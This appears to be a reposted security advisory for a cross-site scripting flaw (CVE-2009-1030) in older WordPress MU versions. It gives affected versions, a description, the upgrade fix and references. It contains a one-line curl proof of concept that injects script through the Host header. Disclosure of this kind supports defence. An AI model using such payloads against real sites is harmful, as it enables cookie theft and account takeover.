Home » Exploits » WordPress MU 'wp-includes/wpmu-functions.php' Cross-Site Scripting Vulnerability WordPress MU 'wp-includes/wpmu-functions.php' Cross-Site Scripting Vulnerability Feeds - Exploits Written by Juan Galiana Lara    Thursday, 26 March 2009 22:47 WordPress MU 'wp-includes/wpmu-functions.php' Cross-Site Scripting Vulnerability -\\Bugtraq ID: 34075 -\\Class: Input Validation Error -\\CVE: CVE-2009-1030 -\\Remote: Yes -\\Local: No -\\Published: Mar 10 2009 12:00AM -\\Updated: Mar 26 2009 04:26PM -\\Credit: Juan Galiana Lara -\\Vulnerable: WordPress WordPress MU 1.3.1 WordPress WordPress MU 1.3 WordPress WordPress MU 1.2.3 WordPress WordPress MU 1.2.2 WordPress WordPress MU  2.6 -\\Not Vulnerable: WordPress WordPress MU  2.7 -\\Discussion WordPress MU is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Versions prior to WordPress MU 2.7 are vulnerable. -\\Exploit(s)/PoC(s): An  attacker can exploit this issue by enticing an unsuspecting user to  follow a malicious URI. The following proof of concept is available: curl -H "Cookie: my cookies here" -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php> tmp.html $ firefox tmp.html -\\Solution The vendor has released WordPress MU 2.7 to address this issue.  Please see the references for more information. WordPress WordPress MU  2.6 --WordPress  latest.zip http://mu.wordpress.org/latest.zihttp://mu.wordpress.org/latest.zip WordPress WordPress MU 1.2.2 --WordPress  latest.zip http://mu.wordpress.org/latest.zihttp://mu.wordpress.org/latest.zip WordPress WordPress MU 1.2.3 --WordPress  latest.zip http://mu.wordpress.org/latest.zihttp://mu.wordpress.org/latest.zip WordPress WordPress MU 1.3 --WordPress  latest.zip http://mu.wordpress.org/latest.zihttp://mu.wordpress.org/latest.zip WordPress WordPress MU 1.3.1 --WordPress  latest.zip http://mu.wordpress.org/latest.zihttp://mu.wordpress.org/latest.zip -\\Reference(s) --WordPress Homepage http://wordpress.org  (WordPress) --[ISecAuditors Security Advisories] WordPress MU HTTP Header XSS Vulnerability http://www.securityfocus.com/archive/1/50166  (ISecAuditors Security Advisories < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)

Security Services by HSC Contact us Become partner Advertise with us Join our staff